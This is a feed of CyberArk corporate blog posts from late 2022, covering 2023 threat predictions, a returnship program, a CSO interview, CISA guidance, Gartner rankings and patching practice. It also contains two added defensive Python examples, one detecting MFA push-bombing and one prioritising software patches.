It’s been an eventful 2022 and, based on what our CyberArk Labs team is observing, 2023 will introduce yet another chapter of cybersecurity threats and challenges, along with some new opportunities for vigilant defenders. Here are six of our cybersecurity predictions for the coming year:

1. Web3 on the Blockchain Promises Enhanced Privacy — and Bigger Payouts

Today, more than four out of 10 consumers feel unable to protect their personal data, and many have taken action. This widespread push for greater data transparency and personal control will only grow stronger in 2023, accelerating global momentum for Web3 (aka Web 3.0) on the blockchain. But as technology infrastructure becomes more decentralized, the financial application attack surface will expand significantly, while security practices in this new frontier lag. Threat actors will use this to their advantage to target crypto exchanges and susceptible bridges to the world “off the chain,” drawing inspiration from the $615 million Ronin cryptocurrency heist of 2022.

2. Geopolitical “Winter is Coming,” Along with Increased Attacks on Critical Infrastructure

Our first predicted trend may be exacerbated by the continued conflict in Ukraine, as certain criminal groups ramp up financially motivated attacks and — banking on the promise of massive payouts — shift their gaze in decentralized infrastructure’s direction. Meanwhile, winter is rapidly approaching Eastern Europe, and we can expect attacks on critical infrastructure to spike as temperatures plummet, driving global energy prices up even higher.

3. What’s Old Will Be New Again as Threat Actors Revisit Familiar Tricks

Since Log4j sent shockwaves around the world, speculation on when the other shoe will drop has been constant. But the next “big thing” isn’t likely to be a massive zero day — especially as prices for these coveted vulnerabilities reach upwards of $10 million on darknets and other underground marketplaces, and well-resourced groups and nation-states compete fiercely. Most threat actors will use alternative ways to infiltrate organizations and move laterally toward their targets. And at the end of the day, why would they spend so much cash on a specialized exploit or time contriving new methods when old tricks like phishing, credential theft and social engineering, or one-day kernel-level or memory corruption exploits work just fine?

4. Forget New Year’s Diets — Your Cookies Will Be Too Irresistible

The good news is most organizations no longer view multifactor authentication (MFA) as a “nice to have” for their business applications, meaning most users must input both a username/password combo and complete a secondary authentication challenge before establishing a web session. The bad news is attackers are getting more sophisticated in snagging session cookies — which establish access to these third-party applications — to bypass both primary authentication and MFA and hijack accounts. As organizations continue to adopt more SaaS applications and consolidate them on the browser, session cookies will become even more critical and more vulnerable. With Genesis Store and other marketplaces specializing in stolen session cookies growing in popularity, threat actors will seek ways to further automate and scale these session hijacking attacks to boost profitability next year.

5. A Silver Lining in the Commoditized Credential Age

2023 is the year to begin a career in cybercrime, thanks to the commoditization of the credential. Would-be attackers who lack the skills (or time) can simply browse on a marketplace, fill their carts with cheap lists of stolen credentials and cookies or off-the-shelf ransomware, phishing and exploit kits and check out — no attack legwork required. In this environment, MFA and two-factor authentication won’t be enough. Yet there will be a silver lining for security teams that take a defense-in-depth approach — one that could swing the pendulum in their favor. Rushing to get rich quick, many cybercriminals will make rookie mistakes or create far too much noise on the network, foiling their plans. For instance, pushing 20 authorization requests in rapid succession as part of an MFA bombing attempt will show up in the victim organization’s logs and raise major red flags.
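A minimal detection for the MFA-bombing pattern described above, written as an added example rather than CyberArk’s own code: it scans IdP-style authentication logs for any user who receives a burst of push challenges in a short window and escalates if a push is approved during that burst. The log format, field names, sample lines, threshold and window are all constructed assumptions for this example and need tuning against your own IdP’s export.

```python
"""Flag MFA push-bombing (MFA fatigue) bursts in authentication logs.

Added example, not CyberArk code. The log line format below is constructed
for this example: one line per push challenge, with the user's response.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timezone

# Constructed log format: ISO-8601 UTC timestamp, user, event, result.
LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+user=(?P<user>\S+)\s+event=(?P<event>\S+)\s+result=(?P<result>\S+)$"
)

# Constructed sample: bob is normal, alice is bombed (and finally approves),
# carol gets five pushes spread over ten minutes, which is not a burst.
SAMPLE_LOG = """\
2022-11-21T08:00:01Z user=bob event=mfa_push result=approved
2022-11-21T08:30:14Z user=bob event=mfa_push result=approved
2022-11-21T09:00:00Z user=alice event=mfa_push result=denied
2022-11-21T09:00:12Z user=alice event=mfa_push result=denied
2022-11-21T09:00:25Z user=alice event=mfa_push result=denied
2022-11-21T09:00:40Z user=alice event=mfa_push result=timeout
2022-11-21T09:00:55Z user=alice event=mfa_push result=denied
2022-11-21T09:01:08Z user=alice event=mfa_push result=denied
2022-11-21T09:01:20Z user=alice event=mfa_push result=denied
2022-11-21T09:01:32Z user=alice event=mfa_push result=approved
2022-11-21T10:00:00Z user=carol event=mfa_push result=approved
2022-11-21T10:02:30Z user=carol event=mfa_push result=approved
2022-11-21T10:05:00Z user=carol event=mfa_push result=approved
2022-11-21T10:07:30Z user=carol event=mfa_push result=approved
2022-11-21T10:10:00Z user=carol event=mfa_push result=approved
"""


def parse_line(line):
    """Parse one constructed log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return {"ts": ts, "user": m["user"], "event": m["event"], "result": m["result"]}


def detect_push_bombing(lines, threshold=5, window_seconds=120):
    """Return {user: alert} for every user with >= threshold pushes inside any
    sliding window of window_seconds. Lines are assumed chronological per user.

    Each alert records the peak push count in a window, how many of the pushes
    in the latest window were denied by the user, and whether a push was
    approved while the burst was still in progress (the attacker got in).
    """
    recent = defaultdict(deque)  # user -> recent push records within the window
    alerts = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["event"] != "mfa_push":
            continue
        q = recent[rec["user"]]
        q.append(rec)
        # Drop pushes that fell out of the sliding window.
        while (q[-1]["ts"] - q[0]["ts"]).total_seconds() > window_seconds:
            q.popleft()
        if len(q) < threshold:
            continue
        alert = alerts.setdefault(rec["user"], {
            "pushes": 0, "denied": 0, "first": q[0]["ts"], "last": None,
            "approved_after_burst": False,
        })
        alert["pushes"] = max(alert["pushes"], len(q))
        alert["denied"] = sum(1 for r in q if r["result"] == "denied")
        alert["last"] = q[-1]["ts"]
        if rec["result"] == "approved":
            alert["approved_after_burst"] = True
    return alerts


def run_sample():
    """Run the detector over the constructed sample log."""
    return detect_push_bombing(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for user, alert in run_sample().items():
        sev = "CRITICAL" if alert["approved_after_burst"] else "HIGH"
        print(f"[{sev}] {user}: {alert['pushes']} pushes, {alert['denied']} denied, "
              f"{alert['first'].isoformat()} .. {alert['last'].isoformat()}")
```

An approval that lands inside a burst of denials is the case worth paging on, since it indicates the user gave in rather than an attacker merely generating noise.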

6. Carbon Credits Will Take Center Stage in Multi-Million-Dollar Schemes

On the heels of the COP27 Climate Conference in Egypt where carbon credits took center stage, opportunistic cyber attackers will increase efforts to manipulate the murky and largely unregulated voluntary carbon market (VCM). While carbon credits continue to grow in popularity with companies and governments working to reduce emissions and offset their own output, we can expect to see more multi-million-dollar schemes to steal and sell emission-trading rights in the next 12 months.

For more content on stolen session cookies, register for our Nov. 30, 2022 webinar, “No More Cookies for You: Attacking and Defending Credentials in Chromium-Based Browsers” — presented by Shay Nahari, VP of CyberArk Red Team Services, and Andy Thompson, Global Research Evangelist, CyberArk Labs.

]]>
Returnship Programs Normalize Career Breaks – For Everyone’s Benefit https://www.cyberark.com/blog/returnship-programs-normalize-career-breaks-for-everyones-benefit/ Wed, 16 Nov 2022 15:00:46 +0000 https://www.cyberark.com/?p=136502

During the pandemic, four million women — a significantly higher number than men — left the workforce, mostly to take on caretaking duties. While the past few years have emphasized this gender imbalance, “career breaks” are nothing new for many women around the world. When the time comes to re-enter the workforce, they often face challenges.

Explaining the Résumé Gap

Such was the case for Neethu Shenoy, an engineer who paused her career and made an international move to the United States after her daughter was born. Though she was eager to reenter the workforce, pandemic-driven delays extended her career break longer than planned — but that didn’t stop her from developing new skills through online training courses.

Still, the thought of re-entering the workforce was daunting. “Six and a half years is a long time,” Shenoy says. “And staying up to date through education and actual work experience are two very different things. I was nervous and lacked confidence during my job search, not knowing how to navigate through the new world for opportunities.”

Research supports this: The longer women remain out of the workforce, the more difficult it is to return. What’s more, one in three workers experiences a loss in confidence after spending a significant amount of time away from work — with women almost twice as likely to be affected as men.

Systems engineer Alena Tychyna echoes these challenges. “There was a huge gap in my résumé. It was hard for me to even make it to the interview process.” But she didn’t give up, submitting more than 50 job applications and continuing to enhance her technical skills at home.

Both Shenoy’s and Tychyna’s job searches ultimately led them to the CyberArk Returnship Program, a recently launched initiative that helps professionals reconnect with their careers. After participating in an immersive program involving full-time work, coaching and mentorship, both women graduated and were offered permanent positions at CyberArk.

Widening the Cybersecurity Talent Pool

In cybersecurity — an industry plagued by talent shortages — returnship programs can widen the talent pool of experienced workers, and also help attract more women to the profession.

Says CyberArk Chief Human Resources Officer Ruth Shaked, “It’s no secret that sourcing for critical, scarce talent remains a top priority for cybersecurity companies like CyberArk. To successfully execute upon our strategy and goals and to delight our customers with solutions and services that meet their Identity Security requirements, it is essential that we have in place an engaged and motivated workforce. For us, meeting that challenge in the face of the war for talent means embracing creative new ways to attract, retain and develop talent. And what better way could there possibly be than to tap into a market of highly motivated and high-potential candidates?”

Shaked continues, “The CyberArk Returnship Program, devised and introduced by one of our senior technical talent acquisition partners, Sheetal Surendran, does just that. When Sheetal pitched the idea to me that we might consider providing an opportunity for women with a technical background and some previous experience to get back into the workforce — after having taken a break for a variety of personal reasons — I couldn’t have been more enthusiastic.”

Shaked views returnship as a true win/win, calling the CyberArk pilot program an important step in “building diverse and inclusive teams that celebrate a variety of backgrounds, skills and perspectives” and “increasing the percentage of women at CyberArk, especially in technical roles.”

“We’ve found that women resuming their professional careers in technical roles — after opting to stay home for a couple of years with their young children or to pursue an important hobby or interest — possess a level of determination to learn and to excel that is unparalleled,” says Shaked.

A Win/Win for Returners and Employers

Regardless of industry, the benefits of returnship programs are many: Returning professionals can expand their knowledge and skills while easing the transition back to work. Meanwhile, managers have more time to evaluate potential additions to their teams, leading to smarter hiring decisions and stronger retention rates.

Sean Gorman, vice president, cloud operations at CyberArk believes this on-the-job “trial period” is particularly helpful for both parties. “Screening only gets you so far and often doesn’t uncover mismatch in team fit, soft skills or even technical skill gaps,” he notes. “This time allows the company to evaluate the relationship for unexpected challenges, and helps the returner make a fair assessment of the job while immersing themself in the company’s culture.”

Bryan Barnes, director of technical support, Americas at CyberArk, says that returners have brought a welcome infusion of knowledge and capacity to his team. In his experience, professionals who have taken a career break often bring valuable life experiences and perspectives to the table. “We’ve noticed that returners tend to be very patient and driven to succeed in a way that many people are not. A career break allows them to define what they want and pursue it with passion,” says Barnes.

Gorman agrees, noting that the soft skills returners bring — which play a huge role in customer-centric work cultures — cannot be overstated. “Different viewpoints help teams solve issues in creative ways, spark new and interesting invention and bring a more meaningful perspective to day-to-day work life,” says Gorman. “My team has found the level of enthusiasm and engagement to be very high, and that returners seem very open to learning and adapting, whereas workers with a bit more confidence in their recent history may sometimes fall into the ‘yeah, I know that’ trap,” he continues.

Fighting the Stigma

For too long, career breaks and résumé gaps have hindered highly qualified professionals from re-entering the workforce and filling desperately needed cybersecurity and STEM roles.

The good news is that things are starting to change for the better. As one example, LinkedIn introduced a “career break” label in 2022 that allows people to better represent their experiences outside of traditional “work.” This label provides helpful context for potential employers and fosters important dialogue during interviews. And as more companies introduce returnship and return-to-work programs, it is also aiding important recruiting and hiring efforts.

Research clearly shows that when women are empowered to re-join the workforce, everyone benefits. To those women considering a move back to work, Tychyna offers these final words of encouragement: “Don’t feel discouraged and don’t ever give up. Your dream job is waiting for you!”

]]>
Deutsche Telekom CSO on the New Rules of Data Privacy https://www.cyberark.com/blog/deutsche-telekom-cso-on-the-new-rules-of-data-privacy/ Thu, 10 Nov 2022 14:00:20 +0000 https://www.cyberark.com/?p=136412 Deutsche Telekom CSO on the New Rules of Data Privacy

The dramatic uptick in data breaches these last few years, fueled by pandemic-era changes and the rise of remote work, has made consumers even more wary about sharing their data and relinquishing control over their personal information. Increasingly, consumers want to align with businesses that prioritize data privacy and protection and are transparent about how they handle cybersecurity. A PwC global survey found consumers don’t expect perfection when it comes to this effort: Rather, they are seeking clear signs of best practices that include proactively integrating privacy and security into products and services (39%), encrypting all consumer information and company databases (38%) and including security experts in the design of each product (36%). In other words, in today’s modern business era, it’s all about earning customers’ trust.

With that serving as a thematic backdrop, Thomas Tschersich, chief security officer of Deutsche Telekom (the parent company of T-Mobile) and chief technology officer of Telekom Security, recently discussed the new rules of data privacy with me as a guest on the CyberArk Trust Issues podcast. He also shared how the telecommunications giant is reimagining its cybersecurity organization and practices in an embrace of the trust mandate. Here are some excerpts from our discussion, with the entire interview available here:

Q: How are you thinking about approaching data privacy in your role? How is it similar or different from cybersecurity overall?

A: When you compare privacy and security, it’s generally the same, but the motivation is different. Privacy is motivated mainly by a legal perspective for protecting personal information. Cybersecurity is motivated from a risk perspective. The end results are the same; therefore, they fit together perfectly.

The reality is we’re working in a trust business. If we want customers to trust us, we must care about protecting their data. When you can demonstrate that data is in good hands and no one can access it, you establish trust, and the business will grow over time.

Q: What are the unique privacy challenges brought on from the work-from-everywhere era?

A: This is mainly a security challenge — it’s about how to protect data when working in an untrusted environment you can’t control. In the past, we built a fence around our infrastructure, and everything inside the fence was protected. All was good and trustworthy. Then came cloud and distributed services, which introduced a lot of services that need to be trusted but operate outside of the so-called fence. Working from home during the pandemic also meant working outside of that fence.

It’s no longer about building a fence around the infrastructure but about bringing security to identities and to the data itself. It’s now about a Zero Trust approach — don’t trust the underlying infrastructure but protect the data and identities with digital rights management and encryption.

Q: What are the top security considerations when it comes to cellular network infrastructure?

A: It’s not really a question about network infrastructure but more about the usage of such infrastructure … and, for example, how we treat mobile phones. When we talk about protecting mobile phones, it’s typically about a pin number or how to block access. We’re not treating them like computers — there’s no security software on many mobile phones. Yet these phones are idling around the entire day connected to the infrastructure, so they’re a perfect choice for attackers. This is the most underestimated threat, in my view.

Q: Tell us a bit about your company’s Cyber Defense and Security Operations center. What kind of work is going on there?

A: It’s mainly monitoring what happens and modeling threat vectors on a 24/7 basis. There are people working to identify the latest threats and trying to build use cases or detection scenarios. Given the increasing complexity of today’s infrastructure, we need to change to an “assume-breach paradigm” and have the mechanisms in place to detect threats early on. The Cyber Defense Center is the answer using detection, automation and machine learning capabilities.

Q: What is the most challenging aspect of the cybersecurity role?

A: The most challenging part of the role is that security has always been treated as a roadblock. My mission has been to counteract that misperception by changing the behavior of the security organization. We’re not the ones telling others what they can’t do. We’re working very hard on becoming the ones telling others how they can do more things in a secure manner. It’s about transforming the security organization, which was treated as a roadblock, into a helping hand for the business.

Security problems are often of our own making. Take the password, for example. The perfect password typically contains multiple characters, has a certain complexity and has to be changed twice a day. Technically, that constitutes a perfect password. But if you consider the entire process, the result is likely that a user will write the password on a sticky note and keep it on their screen — making it a very weak password because it’s written down. Alternatively, if you only require a six-character password and block the account after the second or third wrong login attempt, you have the same level of security without burdening the customer. You have to see people as customers, not users. That’s the difference in this approach to security, and it results in a different solution. It’s not the perfect technical solution but a more perfect end-to-end solution that matters in the end.

Q: When you hire for such a team, what do you look for?

A: You can spend hours in a job interview talking about technology and someone’s ability to code. For me, however, that doesn’t really matter. You can train people to code. You can train them in technology. What you can’t train them in is attitude. For me, that’s the most important thing. I look for people with the right attitude, with passion and with motivation. That is the most valuable factor when choosing people for the team.

For more insights, tune in to the full episode, “Living and Breathing Telecom Trust w/ Thomas Tschersich, CSO of Deutsche Telekom and CTO of Telekom Security,” or listen wherever you get your podcasts.

Editor’s note: This interview has been condensed and edited for length and clarity. 

]]>
CISA CPG Report IDs Top Cybersecurity Steps for SMB Critical Infrastructure Entities https://www.cyberark.com/blog/cisa-cpg-report-ids-top-cybersecurity-steps-for-smb-critical-infrastructure-entities/ Mon, 07 Nov 2022 14:00:27 +0000 https://www.cyberark.com/?p=136309 CISA CPG Report's Cybersecurity Steps for Critical Infrastructure SMBs

The No. 1 cybersecurity challenge across U.S. critical infrastructure is that many organizations haven’t adopted fundamental security controls. Not entirely surprising, the finding comes from the U.S. Cybersecurity and Infrastructure Security Agency’s (CISA) recently released Cross-Sector Cybersecurity Performance Goals (CPGs) report. Its intent is to establish a uniform baseline of fundamental cybersecurity practices for critical infrastructure entities, particularly small-to-midsize businesses (SMBs) seeking risk-prioritized guidance.

The clock started running on the drafting of the report in July 2021 when the Biden administration issued a National Security Memorandum (NSM) outlining steps to safeguard the country’s critical infrastructure. The memorandum called for CISA, along with the National Institute of Standards and Technology (NIST), to produce clear goals compatible across all critical infrastructure sectors.

CPGs and Adoption: Intended to be Accessible, Voluntary

The 37 individual CPGs are small steps that together have the potential to equate to one giant leap for cybersecurity maturity and consistency across the critical infrastructure sectors. The CISA report does note, “The CPGs do not reflect an all-encompassing cybersecurity program — rather, they are a minimum set of practices that organizations should implement and aim to help CI entities, particularly small and medium organizations, get started on their path towards a strong cybersecurity posture.”

In the report’s opening letter, CISA Director Jen Easterly writes, “Ultimately, our hope is that the CPGs will not only serve as a strong foundation for improving cybersecurity across our nation’s critical infrastructure sectors but also as a baseline of security outcomes that merit the trust of the American people.” That is a giant leap.

According to the report, the CPGs were developed by CISA along with hundreds of public and private sector partners, including federal agencies. Although adoption of the CPGs is voluntary, they serve as an affordable quick-start guide to rapidly improve cybersecurity hygiene.

Guidance for SMBs

The need to develop the CPGs is perhaps felt most by SMBs — organizations that are prone to be strapped by limited resources to prepare for and defend against cyber threats.

The conundrum for these businesses is, of course, which cybersecurity practices and initiatives to prioritize and put resources toward first. Where to start can be daunting and confusing, regardless of whether you’re working with a limited or large budget —and every size in between. Considering identity is the primary mechanism enabling IT operations — and a primary target for attackers — Identity Security controls are emerging as a quick win for organizations with limited resources. That’s why it’s not surprising that “account security” is the first category of the CISA CPGs. It’s like building a house —you’re going to need foundational support before trying to put the roof on. It comes down to fundamentals.

Combining Constructional Forces for Foundational Cybersecurity

The 37 foundational CPGs span eight risk categories, each of which includes four elements: TTP or risk addressed, scope, recommended actions and outcomes. Identity Security controls can help address many of the CPGs, especially in the report’s first category, account security, which includes the following seven CPGs:

According to the report, the initial CPGs are just a start and are not considered to be comprehensive. They will be updated every six to 12 months. The next steps in 2022 include CISA and Sector Risk Management Agencies (SRMAs) combining forces to use the CPGs as a foundation for constructing “sector-specific goals.”

Interested in learning how Identity Security capabilities can help address the CPGs? Schedule a meeting or explore the CyberArk Blueprint, a vendor-agnostic framework for defining a roadmap for Identity Security success.

To learn more, register for our Dec. 7, 2022 webinar, “CyberArk’s Perspective: New CISA Cybersecurity Performance Goals for Critical Infrastructure.”

]]>
Identity Security Calls for Leadership Across Categories https://www.cyberark.com/blog/identity-security-calls-for-leadership-across-categories/ Fri, 04 Nov 2022 15:14:46 +0000 https://www.cyberark.com/?p=136196 CyberArk named a Leader in the new 2022 Gartner Magic Quadrant for Access Management

Albert Einstein once said, “The leader is one who, out of the clutter, brings simplicity … out of discord, harmony … and out of difficulty, opportunity.”

CyberArk is the only Leader in both 2022 Gartner® Magic Quadrant™ Reports for Access Management and Privileged Access Management

Today, it is my honor to share that CyberArk has been named a Leader in the new 2022 Gartner Magic Quadrant for Access Management.1 This closely follows our announcement that CyberArk was also named a Leader in the 2022 Gartner Magic Quadrant for Privileged Access Management2 – for the fourth consecutive time. Gartner evaluated more than 20 vendors across the two reports, and CyberArk is the only company to be named a Leader in both reports. Ever.

Thank you to our customers, partners and employees for helping us achieve this prestigious recognition. We believe this underscores CyberArk’s strategy to develop the industry’s most comprehensive and innovative Identity Security Platform, enabling unparalleled protection for all identities – human and machine – across all devices, in cloud and hybrid environments.

Don’t just manage identities. Secure them.

We live in a digital world with no boundaries – so much so that there are 45 machine identities for every human identity, according to CyberArk research. “Privileged users” are no longer just IT admins: We found that 52% of all employee identities have access to sensitive systems and data that attackers can easily exploit. In this environment, every identity at any access point is a gateway to an organization’s most valuable resources.

Security leaders recognize that achieving and maintaining control of every identity is the key to stopping most modern attacks. But they are struggling to implement an identity-first security strategy. Every new digital initiative brings new identity-related challenges and requirements, and new tools are being implemented ad-hoc to address them.

Enterprise security stacks involving multiple vendors and tools have become unwieldy. Teams are juggling multiple solutions – from Identity and Access Management (IAM) to Identity Governance and Administration (IGA) to Privileged Access Management (PAM) – that don’t necessarily integrate with each other, limiting their visibility and control of identities across the enterprise and straining tight resources.

In this landscape, many organizations are seeking to consolidate and simplify security across their complex hybrid and multi-cloud environments.

A recent survey by Gartner, Inc. found that 75% of organizations are pursuing security vendor consolidation in 2022, up from 29% in 2020.3

At CyberArk, we believe consolidation in Identity Security means addressing organizations’ growing requirements with comprehensive capabilities from fewer vendors.

Therefore, Identity Security calls for leadership across categories – it’s not an either/or proposition.

Identity Security: A simplified, comprehensive approach

Centered on intelligent privilege controls, the CyberArk Identity Security Platform seamlessly secures access for all identities and flexibly automates the identity lifecycle, with continuous threat detection and prevention – protecting organizations’ identities and most critical assets. The platform is based on a set of foundational shared services – including AI-powered Identity Security Intelligence – that deliver a unified user experience through a single admin portal and enhance customer value with robust automation and analytics. Through our vast partner network and more than 200 out-of-the-box integrations, CyberArk supports each organization along every step of their Identity Security journey, while helping them maximize existing security investments.

As the Privileged Access Management trailblazer, only CyberArk has the leadership experience, industry expertise and consistent innovation track record to address the broadest range of Identity Security requirements. With a security-first approach grounded in Zero Trust and least privilege, we empower organizations to achieve measurable cyber-risk reduction and meet their strategic business goals.

Leading businesses fearlessly forward

Today’s announcement marks the latest milestone for CyberArk in a momentous 2022. This summer we hosted the world’s largest gathering of Identity Security professionals at our Impact 2022 Boston event. There, we unveiled new platform innovations and advancements in key areas of privileged access management, identity management, cloud privilege security and secrets management to give organizations the confidence they need to accelerate business transformation with less risk. A few months later, we kicked off the CyberArk Impact World Tour to continue sharing our unified Identity Security approach with organizations around the globe.

As we continue to define and lead the Identity Security market, we are innovating rapidly across our CyberArk portfolio. Our Identity Security story is resonating with organizations across industries, who are turning to CyberArk as a trusted partner to secure identities from workforce to privileged users to machines. With a finger on the market pulse and a close eye on the shifting landscape, we continue to invest in strong organic and inorganic growth, and momentum is accelerating for our Identity Security Platform.

Reflecting on this recognition and our accomplishments this year, we again thank our customers, and proudly recognize our employees and partners for their fierce dedication, unwavering integrity and industry-leading innovation.

To learn more, download both complimentary Gartner Magic Quadrant reports here.

For a deeper dive into Identity Security – what it is, how it works and how your organization can benefit – join our CyberArk team for a live webinar on November 16, 2022. Register here to save your spot.


Gartner Disclaimers
*Gartner and Magic Quadrant are registered trademarks of Gartner, Inc. and/or its affiliates in the U.S. and internationally and are used herein with permission. All rights reserved.
Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

1 – Gartner® Magic Quadrant for Access Management, by Henrique Teixeira, Abhyuday Data, Michael Kelley, James Hoover, Brian Guthrie, 1 November 2022

2 – Gartner® Magic Quadrant for Privileged Access Management, by Michael Kelley, James Hoover, Felix Gaehtgens, Abhyuday Data, 19 July 2022

3 – Gartner® Press Release, “Gartner Survey Shows 75% of Organizations Are Pursuing Security Vendor Consolidation in 2022,” 22 September 2022, https://www.gartner.com/en/newsroom/press-releases/2022-09-12-gartner-survey-shows-seventy-five-percent-of-organizations-are-pursuing-security-vendor-consolidation-in-2022


]]>
5 Identity Security Considerations for Updating Software https://www.cyberark.com/blog/5-identity-security-considerations-for-updating-software/ Mon, 31 Oct 2022 13:00:40 +0000 https://www.cyberark.com/?p=136041

Updating software is the final cyber-smart behavior promoted by Cybersecurity Awareness Month 2022 organizers – and an important one to emphasize as we close out the month. For IT security teams, updating software to address bugs and security issues has long been a cybersecurity fundamental. But in most enterprise IT environments, updating software isn’t as easy as it sounds.

Last year, threat researchers logged 18,439 common vulnerabilities and exposures (CVEs) in the NIST National Vulnerability Database (NVD) – or more than 50 new flaws per day. With so many vulnerabilities piling up, security teams don’t have the time or resources to make every software update, every time a new vulnerability is disclosed. Instead, risk-based prioritization is the name of the game. And doing this effectively requires a balance between manual effort and automation.

As your security team brushes up on cybersecurity fundamentals this Cybersecurity Awareness Month, here are five best practices to follow for updating software as part of a broader defense-in-depth approach:

1. Prioritize critical patches. Nearly a year ago, the Log4j zero-day vulnerability shook the world. Yet despite headlines and urgent warnings about the vulnerability’s severity, there are still Log4j instances operating in the wild – and still exposed to cyberattacks. It’s important to watch for critical patches for software deployed in your environment and implement them as soon as possible. Review vendor recommendations for all enterprise software platforms in use, along with any underlying OS and enterprise integrations. Treat these recommended procedures as a must. If you can’t, make sure you understand the security implications and build your defenses accordingly.

2. Check in with third-party vendors when critical patches are released. Make sure they’ve also patched the software you use.

3. Continuously monitor software assets. Automating inventory and tracking processes can help your team push software updates in a timely manner, manage end-of-life software, scope access permissions appropriately and make sure weak or default credentials do not remain in use. This is especially important in hybrid and multi-cloud environments where misconfigurations are rampant.

4. Consider connected IoT devices as part of your multi-layered security strategy. IoT devices – from printers and sensors, to cameras and tablets – often have well-known firmware or software vulnerabilities that can be accessed via weak credentials or default credentials that are hardcoded into the device. Finding ways to automatically monitor and secure the credentials used to access these IoT solutions is key to shrinking the attackable surface area.

5. Focus on the bigger issue. Today, credential theft is security leaders’ No. 1 area of risk. There are countless ways for attackers to steal credentials and exploit identities as a jumping-off point. Instead of just patching identity-centric vulnerabilities ad hoc, many security teams are working to limit privileged access intelligently through automation to make a greater impact. Examples of this include implementing automated detection controls to find and block credential theft attempts, or placing credential “lures” at points along common attack paths to help trigger red flags when intruders try to move through an environment.
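Steps 1 and 3 above come down to one question: given an inventory and a stream of advisories, which patch goes first? The script below is an added example (not CyberArk’s code) of the risk-based prioritization the post describes: it joins a software inventory against an advisory feed, weights each finding by severity, known exploitation, exposure and privilege, and assigns a remediation window. The inventory, package names, versions, advisory IDs (ADV-001 and so on), weights and SLA windows are all constructed for illustration, not real products, CVEs or a published standard.

```python
"""Risk-based patch prioritization over a software inventory.

Added example, not CyberArk's code. The inventory and the advisories are
constructed for illustration: package names, versions and advisory IDs
(ADV-001 ...) are placeholders, not real products or CVEs.
"""
from dataclasses import dataclass
from datetime import date


@dataclass(frozen=True)
class Asset:
    host: str
    package: str
    version: str
    internet_facing: bool
    privileged: bool          # runs as root/SYSTEM or holds privileged credentials


@dataclass(frozen=True)
class Advisory:
    advisory_id: str
    package: str
    fixed_version: str        # first version that carries the fix
    cvss: float               # base score 0.0 - 10.0
    known_exploited: bool     # listed in a known-exploited catalogue (KEV-style)
    published: date


def parse_version(version: str) -> tuple:
    """Dotted-numeric versions only ('2.17.1' -> (2, 17, 1)); compared as tuples."""
    return tuple(int(part) for part in version.split("."))


def is_affected(asset: Asset, advisory: Advisory) -> bool:
    return (asset.package == advisory.package
            and parse_version(asset.version) < parse_version(advisory.fixed_version))


def priority_score(asset: Asset, advisory: Advisory, today: date) -> float:
    """CVSS plus context weights. The weights are this example's assumptions."""
    score = advisory.cvss
    if advisory.known_exploited:
        score += 4.0          # active exploitation outweighs a point of CVSS
    if asset.internet_facing:
        score += 3.0          # reachable by anyone
    if asset.privileged:
        score += 2.0          # compromise yields privileged credentials
    if (today - advisory.published).days > 30:
        score += 1.0          # exploit code has had time to circulate
    return score


def sla_days(score: float) -> int:
    """Remediation window (assumed policy): emergency, priority, routine."""
    if score >= 15:
        return 3
    if score >= 10:
        return 14
    return 30


def prioritize(assets, advisories, today):
    """Return affected (host, package, advisory) findings, highest score first."""
    findings = []
    for asset in assets:
        for adv in advisories:
            if is_affected(asset, adv):
                score = priority_score(asset, adv, today)
                findings.append({
                    "host": asset.host, "package": asset.package,
                    "installed": asset.version, "fixed": adv.fixed_version,
                    "advisory": adv.advisory_id, "score": round(score, 1),
                    "sla_days": sla_days(score),
                })
    findings.sort(key=lambda f: (-f["score"], f["host"]))
    return findings


# Constructed sample inventory and advisory feed.
ASSETS = [
    Asset("web01", "logkit", "2.14.1", internet_facing=True, privileged=False),
    Asset("batch02", "logkit", "2.17.0", internet_facing=False, privileged=True),
    Asset("db01", "tlslib", "3.0.1", internet_facing=False, privileged=True),
    Asset("jump01", "sshd-pkg", "8.9", internet_facing=True, privileged=True),
    Asset("app03", "logkit", "2.17.1", internet_facing=True, privileged=False),  # already fixed
]
ADVISORIES = [
    Advisory("ADV-001", "logkit", "2.17.1", 10.0, True, date(2021, 12, 10)),
    Advisory("ADV-002", "tlslib", "3.0.7", 7.5, False, date(2022, 10, 20)),
    Advisory("ADV-003", "sshd-pkg", "9.1", 5.3, False, date(2022, 10, 1)),
]
TODAY = date(2022, 10, 31)


if __name__ == "__main__":
    for f in prioritize(ASSETS, ADVISORIES, TODAY):
        print(f"{f['host']:8} {f['package']:9} {f['installed']:>7} -> {f['fixed']:<7} "
              f"{f['advisory']} score={f['score']:<5} patch within {f['sla_days']} days")
```

The point of the weighting is that an internet-facing host running a known-exploited component lands in the emergency window even when a less exposed host carries the same advisory, while a medium-severity advisory with no known exploitation falls into the routine cycle; the already-patched host produces no finding at all. In practice the advisory feed would come from the NVD and a known-exploited catalogue and the inventory from the automated asset tracking that step 3 calls for.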

Even if your team had the ability to patch every software or device vulnerability every time, attackers keep innovating. There’s no silver bullet to cybersecurity, which is why assuming breach and layering Identity Security protections with vulnerability assessment, patch management and other critical peripheral defenses is essential for detecting and neutralizing threats faster – before attackers have a chance to cause significant damage.

]]>
CyberArk ESG: Moving Fearlessly and Sustainably Forward https://www.cyberark.com/blog/cyberark-esg-moving-fearlessly-and-sustainably-forward/ Wed, 26 Oct 2022 13:00:38 +0000 https://www.cyberark.com/?p=135952

As our digital and physical worlds change rapidly, Environmental, Social and Governance (ESG) is every business’s business. As part of a broader effort to build a more sustainable world, ESG helps us focus our efforts on the key issues that matter to people, demonstrate integrity and build trust, strengthen our communities and help protect our planet.

At CyberArk, the principles of ESG have always been part of our broader strategy and values. Since we formalized our ESG program in 2020, we’ve continued to build and become more transparent on these principles in key focus areas that matter most to our stakeholders and business.


Milestones from Our Second Annual ESG Report

